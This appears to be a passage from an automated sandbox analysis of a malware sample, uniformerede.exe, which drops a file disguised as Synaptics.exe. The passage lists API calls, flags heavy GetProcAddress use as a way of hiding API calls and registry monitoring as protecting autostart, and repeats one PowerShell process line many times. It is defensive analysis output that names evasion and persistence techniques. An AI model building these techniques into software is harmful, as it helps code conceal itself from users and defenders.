Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	9_2_00459934
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	9_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	9_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,	9_2_0042C6FC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0044083C IsIconic,GetCapture,	9_2_0044083C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	9_2_0045695C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	9_2_004410F0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	9_2_00441A14
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	12_2_00459934
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	12_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	12_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,	12_2_0042C6FC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0044083C IsIconic,GetCapture,	12_2_0044083C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	12_2_0045695C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	12_2_004410F0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	12_2_00441A14

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_0042E3B4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_0042E3B4

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\ProgramData\Synaptics\Synaptics.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
